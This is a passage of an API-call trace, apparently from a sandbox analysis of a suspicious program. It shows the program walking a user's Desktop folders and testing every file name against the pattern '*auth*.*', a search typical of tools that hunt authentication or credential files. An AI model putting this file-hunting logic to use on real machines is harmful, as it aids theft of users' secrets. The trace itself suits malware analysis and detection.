ftLastAccessTime.dwLowDateTime=0x89c45de0, ftLastAccessTime.dwHighDateTime=0x1d7aeaa, ftLastWriteTime.dwLowDateTime=0x89c45de0, ftLastWriteTime.dwHighDateTime=0x1d7aeaa, nFileSizeHigh=0x0, nFileSizeLow=0xac61, dwReserved0=0x0, dwReserved1=0x0, cFileName="LyMn8DqKE.jpg", cAlternateFileName="LYMN8D~1.JPG")) returned 1 [0110.984] lstrcpyW (in: lpString1=0x19ce30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.984] PathMatchSpecW (pszFile="LyMn8DqKE.jpg", pszSpec="*auth*.*") returned 0 [0110.984] FindNextFileW (in: hFindFile=0x743420, lpFindFileData=0x19cbe0 | out: lpFindFileData=0x19cbe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x39c99910, ftCreationTime.dwHighDateTime=0x1d7af1b, ftLastAccessTime.dwLowDateTime=0x44bbdf10, ftLastAccessTime.dwHighDateTime=0x1d7af4b, ftLastWriteTime.dwLowDateTime=0x44bbdf10, ftLastWriteTime.dwHighDateTime=0x1d7af4b, nFileSizeHigh=0x0, nFileSizeLow=0x6aba, dwReserved0=0x0, dwReserved1=0x0, cFileName="MB3JQQUgbwGVRNgeCA.gif", cAlternateFileName="MB3JQQ~1.GIF")) returned 1 [0110.984] lstrcpyW (in: lpString1=0x19ce30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.984] PathMatchSpecW (pszFile="MB3JQQUgbwGVRNgeCA.gif", pszSpec="*auth*.*") returned 0 [0110.984] FindNextFileW (in: hFindFile=0x743420, lpFindFileData=0x19cbe0 | out: lpFindFileData=0x19cbe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53c41370, ftCreationTime.dwHighDateTime=0x1d7ae73, ftLastAccessTime.dwLowDateTime=0x50a541d0, ftLastAccessTime.dwHighDateTime=0x1d7af24, ftLastWriteTime.dwLowDateTime=0x50a541d0, ftLastWriteTime.dwHighDateTime=0x1d7af24, nFileSizeHigh=0x0, nFileSizeLow=0x17a6a, dwReserved0=0x0, dwReserved1=0x0, cFileName="O93_HCF.xlsx", cAlternateFileName="O93_HC~1.XLS")) returned 1 [0110.984] lstrcpyW (in: lpString1=0x19ce30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.984] PathMatchSpecW (pszFile="O93_HCF.xlsx", pszSpec="*auth*.*") returned 0 [0110.984] FindNextFileW (in: hFindFile=0x743420, lpFindFileData=0x19cbe0 | out: lpFindFileData=0x19cbe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x212b71d0, ftCreationTime.dwHighDateTime=0x1d7a377, ftLastAccessTime.dwLowDateTime=0xbbf74c40, ftLastAccessTime.dwHighDateTime=0x1d7ac26, ftLastWriteTime.dwLowDateTime=0xbbf74c40, ftLastWriteTime.dwHighDateTime=0x1d7ac26, nFileSizeHigh=0x0, nFileSizeLow=0x4735, dwReserved0=0x0, dwReserved1=0x0, cFileName="Oar504.gif", cAlternateFileName="")) returned 1 [0110.984] lstrcpyW (in: lpString1=0x19ce30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.984] PathMatchSpecW (pszFile="Oar504.gif", pszSpec="*auth*.*") returned 0 [0110.984] FindNextFileW (in: hFindFile=0x743420, lpFindFileData=0x19cbe0 | out: lpFindFileData=0x19cbe0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6f850b00, ftCreationTime.dwHighDateTime=0x1d79feb, ftLastAccessTime.dwLowDateTime=0x5f0c9990, ftLastAccessTime.dwHighDateTime=0x1d7ae10, ftLastWriteTime.dwLowDateTime=0x5f0c9990, ftLastWriteTime.dwHighDateTime=0x1d7ae10, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="p B1LdDcHaeS", cAlternateFileName="PB1LDD~1")) returned 1 [0110.984] lstrcpyW (in: lpString1=0x19ce30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.984] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\*.*", lpFindFileData=0x19c260 | out: lpFindFileData=0x19c260*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6f850b00, ftCreationTime.dwHighDateTime=0x1d79feb, ftLastAccessTime.dwLowDateTime=0x5f0c9990, ftLastAccessTime.dwHighDateTime=0x1d7ae10, ftLastWriteTime.dwLowDateTime=0x5f0c9990, ftLastWriteTime.dwHighDateTime=0x1d7ae10, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x7434e0 [0110.984] lstrcpyW (in: lpString1=0x19c4b0, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS" [0110.984] FindNextFileW (in: hFindFile=0x7434e0, lpFindFileData=0x19c260 | out: lpFindFileData=0x19c260*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6f850b00, ftCreationTime.dwHighDateTime=0x1d79feb, ftLastAccessTime.dwLowDateTime=0x5f0c9990, ftLastAccessTime.dwHighDateTime=0x1d7ae10, ftLastWriteTime.dwLowDateTime=0x5f0c9990, ftLastWriteTime.dwHighDateTime=0x1d7ae10, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0110.985] lstrcpyW (in: lpString1=0x19c4b0, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS" [0110.985] FindNextFileW (in: hFindFile=0x7434e0, lpFindFileData=0x19c260 | out: lpFindFileData=0x19c260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4c5cc6e0, ftCreationTime.dwHighDateTime=0x1d7a2e8, ftLastAccessTime.dwLowDateTime=0x5ed18130, ftLastAccessTime.dwHighDateTime=0x1d7a4a0, ftLastWriteTime.dwLowDateTime=0x5ed18130, ftLastWriteTime.dwHighDateTime=0x1d7a4a0, nFileSizeHigh=0x0, nFileSizeLow=0x34c4, dwReserved0=0x0, dwReserved1=0x0, cFileName="6eLLiqLz9t.avi", cAlternateFileName="6ELLIQ~1.AVI")) returned 1 [0110.985] lstrcpyW (in: lpString1=0x19c4b0, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS" [0110.985] PathMatchSpecW (pszFile="6eLLiqLz9t.avi", pszSpec="*auth*.*") returned 0 [0110.985] FindNextFileW (in: hFindFile=0x7434e0, lpFindFileData=0x19c260 | out: lpFindFileData=0x19c260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe18e7860, ftCreationTime.dwHighDateTime=0x1d7a074, ftLastAccessTime.dwLowDateTime=0x48a8aa90, ftLastAccessTime.dwHighDateTime=0x1d7ab22, ftLastWriteTime.dwLowDateTime=0x48a8aa90, ftLastWriteTime.dwHighDateTime=0x1d7ab22, nFileSizeHigh=0x0, nFileSizeLow=0xdfb2, dwReserved0=0x0, dwReserved1=0x0, cFileName="D9uCaq_HSLxl.pdf", cAlternateFileName="D9UCAQ~1.PDF")) returned 1 [0110.985] lstrcpyW (in: lpString1=0x19c4b0, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS" [0110.985] PathMatchSpecW (pszFile="D9uCaq_HSLxl.pdf", pszSpec="*auth*.*") returned 0 [0110.985] FindNextFileW (in: hFindFile=0x7434e0, lpFindFileData=0x19c260 | out: lpFindFileData=0x19c260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8974c4f0, ftCreationTime.dwHighDateTime=0x1d7af73, ftLastAccessTime.dwLowDateTime=0x4d8c28d0, ftLastAccessTime.dwHighDateTime=0x1d7b012, ftLastWriteTime.dwLowDateTime=0x4d8c28d0, ftLastWriteTime.dwHighDateTime=0x1d7b012, nFileSizeHigh=0x0, nFileSizeLow=0x7537, dwReserved0=0x0, dwReserved1=0x0, cFileName="E144W5Mz.swf", cAlternateFileName="")) returned 1 [0110.985] lstrcpyW (in: lpString1=0x19c4b0, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS" [0110.985] PathMatchSpecW (pszFile="E144W5Mz.swf", pszSpec="*auth*.*") returned 0 [0110.985] FindNextFileW (in: hFindFile=0x7434e0, lpFindFileData=0x19c260 | out: lpFindFileData=0x19c260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd254fcd0, ftCreationTime.dwHighDateTime=0x1d7a618, ftLastAccessTime.dwLowDateTime=0x8a464820, ftLastAccessTime.dwHighDateTime=0x1d7aac5, ftLastWriteTime.dwLowDateTime=0x8a464820, ftLastWriteTime.dwHighDateTime=0x1d7aac5, nFileSizeHigh=0x0, nFileSizeLow=0xbc6a, dwReserved0=0x0, dwReserved1=0x0, cFileName="lDOubGqNdXLFW1EA.wav", cAlternateFileName="LDOUBG~1.WAV")) returned 1 [0110.985] lstrcpyW (in: lpString1=0x19c4b0, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS" [0110.985] PathMatchSpecW (pszFile="lDOubGqNdXLFW1EA.wav", pszSpec="*auth*.*") returned 0 [0110.985] FindNextFileW (in: hFindFile=0x7434e0, lpFindFileData=0x19c260 | out: lpFindFileData=0x19c260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4da7350, ftCreationTime.dwHighDateTime=0x1d79ff8, ftLastAccessTime.dwLowDateTime=0x83641e80, ftLastAccessTime.dwHighDateTime=0x1d7ac8a, ftLastWriteTime.dwLowDateTime=0x83641e80, ftLastWriteTime.dwHighDateTime=0x1d7ac8a, nFileSizeHigh=0x0, nFileSizeLow=0x10bdd, dwReserved0=0x0, dwReserved1=0x0, cFileName="OFSiahfxrlNjf.swf", cAlternateFileName="OFSIAH~1.SWF")) returned 1 [0110.985] lstrcpyW (in: lpString1=0x19c4b0, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS" [0110.985] PathMatchSpecW (pszFile="OFSiahfxrlNjf.swf", pszSpec="*auth*.*") returned 0 [0110.985] FindNextFileW (in: hFindFile=0x7434e0, lpFindFileData=0x19c260 | out: lpFindFileData=0x19c260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x52198c70, ftCreationTime.dwHighDateTime=0x1d7a68b, ftLastAccessTime.dwLowDateTime=0xa83a5210, ftLastAccessTime.dwHighDateTime=0x1d7b022, ftLastWriteTime.dwLowDateTime=0xa83a5210, ftLastWriteTime.dwHighDateTime=0x1d7b022, nFileSizeHigh=0x0, nFileSizeLow=0x10237, dwReserved0=0x0, dwReserved1=0x0, cFileName="ws8IgIZUQH.mkv", cAlternateFileName="WS8IGI~1.MKV")) returned 1 [0110.985] lstrcpyW (in: lpString1=0x19c4b0, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS" [0110.985] PathMatchSpecW (pszFile="ws8IgIZUQH.mkv", pszSpec="*auth*.*") returned 0 [0110.985] FindNextFileW (in: hFindFile=0x7434e0, lpFindFileData=0x19c260 | out: lpFindFileData=0x19c260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x34f22090, ftCreationTime.dwHighDateTime=0x1d7accf, ftLastAccessTime.dwLowDateTime=0x925b6d20, ftLastAccessTime.dwHighDateTime=0x1d7b04b, ftLastWriteTime.dwLowDateTime=0x925b6d20, ftLastWriteTime.dwHighDateTime=0x1d7b04b, nFileSizeHigh=0x0, nFileSizeLow=0x40eb, dwReserved0=0x0, dwReserved1=0x0, cFileName="Y_Iia0ILxn.gif", cAlternateFileName="Y_IIA0~1.GIF")) returned 1 [0110.986] lstrcpyW (in: lpString1=0x19c4b0, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS" [0110.986] PathMatchSpecW (pszFile="Y_Iia0ILxn.gif", pszSpec="*auth*.*") returned 0 [0110.986] FindNextFileW (in: hFindFile=0x7434e0, lpFindFileData=0x19c260 | out: lpFindFileData=0x19c260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x34f22090, ftCreationTime.dwHighDateTime=0x1d7accf, ftLastAccessTime.dwLowDateTime=0x925b6d20, ftLastAccessTime.dwHighDateTime=0x1d7b04b, ftLastWriteTime.dwLowDateTime=0x925b6d20, ftLastWriteTime.dwHighDateTime=0x1d7b04b, nFileSizeHigh=0x0, nFileSizeLow=0x40eb, dwReserved0=0x0, dwReserved1=0x0, cFileName="Y_Iia0ILxn.gif", cAlternateFileName="Y_IIA0~1.GIF")) returned 0 [0110.986] FindClose (in: hFindFile=0x7434e0 | out: hFindFile=0x7434e0) returned 1 [0110.986] PathMatchSpecW (pszFile="p B1LdDcHaeS", pszSpec="*auth*.*") returned 0 [0110.986] FindNextFileW (in: hFindFile=0x743420, lpFindFileData=0x19cbe0 | out: lpFindFileData=0x19cbe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x89c892e0, ftCreationTime.dwHighDateTime=0x1d7a502, ftLastAccessTime.dwLowDateTime=0x959e5ed0, ftLastAccessTime.dwHighDateTime=0x1d7a5a5, ftLastWriteTime.dwLowDateTime=0x959e5ed0, ftLastWriteTime.dwHighDateTime=0x1d7a5a5, nFileSizeHigh=0x0, nFileSizeLow=0x12c4, dwReserved0=0x0, dwReserved1=0x0, cFileName="PKW-syaNOG91rV.gif", cAlternateFileName="PKW-SY~1.GIF")) returned 1 [0110.986] lstrcpyW (in: lpString1=0x19ce30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.986] PathMatchSpecW (pszFile="PKW-syaNOG91rV.gif", pszSpec="*auth*.*") returned 0 [0110.986] FindNextFileW (in: hFindFile=0x743420, lpFindFileData=0x19cbe0 | out: lpFindFileData=0x19cbe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf6e0cbd0, ftCreationTime.dwHighDateTime=0x1d7a4cc, ftLastAccessTime.dwLowDateTime=0x9ce51cb0, ftLastAccessTime.dwHighDateTime=0x1d7a54b, ftLastWriteTime.dwLowDateTime=0x9ce51cb0, ftLastWriteTime.dwHighDateTime=0x1d7a54b, nFileSizeHigh=0x0, nFileSizeLow=0xdff5, dwReserved0=0x0, dwReserved1=0x0, cFileName="QjzdslaoFnrvJ.flv", cAlternateFileName="QJZDSL~1.FLV")) returned 1 [0110.986] lstrcpyW (in: lpString1=0x19ce30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.986] PathMatchSpecW (pszFile="QjzdslaoFnrvJ.flv", pszSpec="*auth*.*") returned 0 [0110.986] FindNextFileW (in: hFindFile=0x743420, lpFindFileData=0x19cbe0 | out: lpFindFileData=0x19cbe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9d327160, ftCreationTime.dwHighDateTime=0x1d7aa85, ftLastAccessTime.dwLowDateTime=0x45629f70, ftLastAccessTime.dwHighDateTime=0x1d7ac63, ftLastWriteTime.dwLowDateTime=0x45629f70, ftLastWriteTime.dwHighDateTime=0x1d7ac63, nFileSizeHigh=0x0, nFileSizeLow=0x11a52, dwReserved0=0x0, dwReserved1=0x0, cFileName="QqfcEGsF2dGoVC.mp4", cAlternateFileName="QQFCEG~1.MP4")) returned 1 [0110.986] lstrcpyW (in: lpString1=0x19ce30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.986] PathMatchSpecW (pszFile="QqfcEGsF2dGoVC.mp4", pszSpec="*auth*.*") returned 0 [0110.986] FindNextFileW (in: hFindFile=0x743420, lpFindFileData=0x19cbe0 | out: lpFindFileData=0x19cbe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7bf0caa0, ftCreationTime.dwHighDateTime=0x1d7af0e, ftLastAccessTime.dwLowDateTime=0xada19040, ftLastAccessTime.dwHighDateTime=0x1d7af75, ftLastWriteTime.dwLowDateTime=0xada19040, ftLastWriteTime.dwHighDateTime=0x1d7af75, nFileSizeHigh=0x0, nFileSizeLow=0x1311b, dwReserved0=0x0, dwReserved1=0x0, cFileName="SSkrbDuTIF.m4a", cAlternateFileName="SSKRBD~1.M4A")) returned 1 [0110.986] lstrcpyW (in: lpString1=0x19ce30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.986] PathMatchSpecW (pszFile="SSkrbDuTIF.m4a", pszSpec="*auth*.*") returned 0 [0110.986] FindNextFileW (in: hFindFile=0x743420, lpFindFileData=0x19cbe0 | out: lpFindFileData=0x19cbe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x285d0430, ftCreationTime.dwHighDateTime=0x1d7aa27, ftLastAccessTime.dwLowDateTime=0xcfb35a10, ftLastAccessTime.dwHighDateTime=0x1d7ad22, ftLastWriteTime.dwLowDateTime=0xcfb35a10, ftLastWriteTime.dwHighDateTime=0x1d7ad22, nFileSizeHigh=0x0, nFileSizeLow=0xc05d, dwReserved0=0x0, dwReserved1=0x0, cFileName="StgqeHlfrw0.m4a", cAlternateFileName="STGQEH~1.M4A")) returned 1 [0110.986] lstrcpyW (in: lpString1=0x19ce30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.986] PathMatchSpecW (pszFile="StgqeHlfrw0.m4a", pszSpec="*auth*.*") returned 0 [0110.987] FindNextFileW (in: hFindFile=0x743420, lpFindFileData=0x19cbe0 | out: lpFindFileData=0x19cbe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5cc60f70, ftCreationTime.dwHighDateTime=0x1d7a02f, ftLastAccessTime.dwLowDateTime=0xa9de71c0, ftLastAccessTime.dwHighDateTime=0x1d7a585, ftLastWriteTime.dwLowDateTime=0xa9de71c0, ftLastWriteTime.dwHighDateTime=0x1d7a585, nFileSizeHigh=0x0, nFileSizeLow=0x1280, dwReserved0=0x0, dwReserved1=0x0, cFileName="SWeD.odt", cAlternateFileName="")) returned 1 [0110.987] lstrcpyW (in: lpString1=0x19ce30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.987] PathMatchSpecW (pszFile="SWeD.odt", pszSpec="*auth*.*") returned 0 [0110.987] FindNextFileW (in: hFindFile=0x743420, lpFindFileData=0x19cbe0 | out: lpFindFileData=0x19cbe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2a932a00, ftCreationTime.dwHighDateTime=0x1d7a7f6, ftLastAccessTime.dwLowDateTime=0x6167a550, ftLastAccessTime.dwHighDateTime=0x1d7ae78, ftLastWriteTime.dwLowDateTime=0x6167a550, ftLastWriteTime.dwHighDateTime=0x1d7ae78, nFileSizeHigh=0x0, nFileSizeLow=0x9172, dwReserved0=0x0, dwReserved1=0x0, cFileName="UQk58h 9TQk7yvi7D.mkv", cAlternateFileName="UQK58H~1.MKV")) returned 1 [0110.987] lstrcpyW (in: lpString1=0x19ce30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.987] PathMatchSpecW (pszFile="UQk58h 9TQk7yvi7D.mkv", pszSpec="*auth*.*") returned 0 [0110.987] FindNextFileW (in: hFindFile=0x743420, lpFindFileData=0x19cbe0 | out: lpFindFileData=0x19cbe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd8827190, ftCreationTime.dwHighDateTime=0x1d7aa97, ftLastAccessTime.dwLowDateTime=0x8be18a00, ftLastAccessTime.dwHighDateTime=0x1d7ac64, ftLastWriteTime.dwLowDateTime=0x8be18a00, ftLastWriteTime.dwHighDateTime=0x1d7ac64, nFileSizeHigh=0x0, nFileSizeLow=0xefc6, dwReserved0=0x0, dwReserved1=0x0, cFileName="VAHC8zDa9SevTeoKicIh.docx", cAlternateFileName="VAHC8Z~1.DOC")) returned 1 [0110.987] lstrcpyW (in: lpString1=0x19ce30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.987] PathMatchSpecW (pszFile="VAHC8zDa9SevTeoKicIh.docx", pszSpec="*auth*.*") returned 0 [0110.987] FindNextFileW (in: hFindFile=0x743420, lpFindFileData=0x19cbe0 | out: lpFindFileData=0x19cbe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfeb7dc60, ftCreationTime.dwHighDateTime=0x1d7aa10, ftLastAccessTime.dwLowDateTime=0xa18851b0, ftLastAccessTime.dwHighDateTime=0x1d7ac6c, ftLastWriteTime.dwLowDateTime=0xa18851b0, ftLastWriteTime.dwHighDateTime=0x1d7ac6c, nFileSizeHigh=0x0, nFileSizeLow=0x10367, dwReserved0=0x0, dwReserved1=0x0, cFileName="VbI-8gh.mkv", cAlternateFileName="")) returned 1 [0110.987] lstrcpyW (in: lpString1=0x19ce30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.987] PathMatchSpecW (pszFile="VbI-8gh.mkv", pszSpec="*auth*.*") returned 0 [0110.987] FindNextFileW (in: hFindFile=0x743420, lpFindFileData=0x19cbe0 | out: lpFindFileData=0x19cbe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x51556710, ftCreationTime.dwHighDateTime=0x1d7a815, ftLastAccessTime.dwLowDateTime=0xb84e1ac0, ftLastAccessTime.dwHighDateTime=0x1d7a9ff, ftLastWriteTime.dwLowDateTime=0xb84e1ac0, ftLastWriteTime.dwHighDateTime=0x1d7a9ff, nFileSizeHigh=0x0, nFileSizeLow=0x888f, dwReserved0=0x0, dwReserved1=0x0, cFileName="wwAL7t.mp4", cAlternateFileName="")) returned 1 [0110.987] lstrcpyW (in: lpString1=0x19ce30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.987] PathMatchSpecW (pszFile="wwAL7t.mp4", pszSpec="*auth*.*") returned 0 [0110.987] FindNextFileW (in: hFindFile=0x743420, lpFindFileData=0x19cbe0 | out: lpFindFileData=0x19cbe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa619a40, ftCreationTime.dwHighDateTime=0x1d7a2e8, ftLastAccessTime.dwLowDateTime=0x562811b0, ftLastAccessTime.dwHighDateTime=0x1d7af50, ftLastWriteTime.dwLowDateTime=0x562811b0, ftLastWriteTime.dwHighDateTime=0x1d7af50, nFileSizeHigh=0x0, nFileSizeLow=0x1057b, dwReserved0=0x0, dwReserved1=0x0, cFileName="XDMAiqRYF.jpg", cAlternateFileName="XDMAIQ~1.JPG")) returned 1 [0110.987] lstrcpyW (in: lpString1=0x19ce30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.987] PathMatchSpecW (pszFile="XDMAiqRYF.jpg", pszSpec="*auth*.*") returned 0 [0110.987] FindNextFileW (in: hFindFile=0x743420, lpFindFileData=0x19cbe0 | out: lpFindFileData=0x19cbe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x99eb9cb0, ftCreationTime.dwHighDateTime=0x1d7aca7, ftLastAccessTime.dwLowDateTime=0x28bfee50, ftLastAccessTime.dwHighDateTime=0x1d7ae51, ftLastWriteTime.dwLowDateTime=0x28bfee50, ftLastWriteTime.dwHighDateTime=0x1d7ae51, nFileSizeHigh=0x0, nFileSizeLow=0x1505d, dwReserved0=0x0, dwReserved1=0x0, cFileName="xmxJletH7GW6y.bmp", cAlternateFileName="XMXJLE~1.BMP")) returned 1 [0110.987] lstrcpyW (in: lpString1=0x19ce30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.987] PathMatchSpecW (pszFile="xmxJletH7GW6y.bmp", pszSpec="*auth*.*") returned 0 [0110.987] FindNextFileW (in: hFindFile=0x743420, lpFindFileData=0x19cbe0 | out: lpFindFileData=0x19cbe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf995fa10, ftCreationTime.dwHighDateTime=0x1d7a3b6, ftLastAccessTime.dwLowDateTime=0x6882a8f0, ftLastAccessTime.dwHighDateTime=0x1d7aec6, ftLastWriteTime.dwLowDateTime=0x6882a8f0, ftLastWriteTime.dwHighDateTime=0x1d7aec6, nFileSizeHigh=0x0, nFileSizeLow=0x94d9, dwReserved0=0x0, dwReserved1=0x0, cFileName="yBTl 8ysJ.mp3", cAlternateFileName="YBTL8Y~1.MP3")) returned 1 [0110.987] lstrcpyW (in: lpString1=0x19ce30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.988] PathMatchSpecW (pszFile="yBTl 8ysJ.mp3", pszSpec="*auth*.*") returned 0 [0110.988] FindNextFileW (in: hFindFile=0x743420, lpFindFileData=0x19cbe0 | out: lpFindFileData=0x19cbe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2e10ef30, ftCreationTime.dwHighDateTime=0x1d7a5be, ftLastAccessTime.dwLowDateTime=0xe222b410, ftLastAccessTime.dwHighDateTime=0x1d7a972, ftLastWriteTime.dwLowDateTime=0xe222b410, ftLastWriteTime.dwHighDateTime=0x1d7a972, nFileSizeHigh=0x0, nFileSizeLow=0x1616d, dwReserved0=0x0, dwReserved1=0x0, cFileName="ZyW0U6HGvR1sY4.mkv", cAlternateFileName="ZYW0U6~1.MKV")) returned 1 [0110.988] lstrcpyW (in: lpString1=0x19ce30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.988] PathMatchSpecW 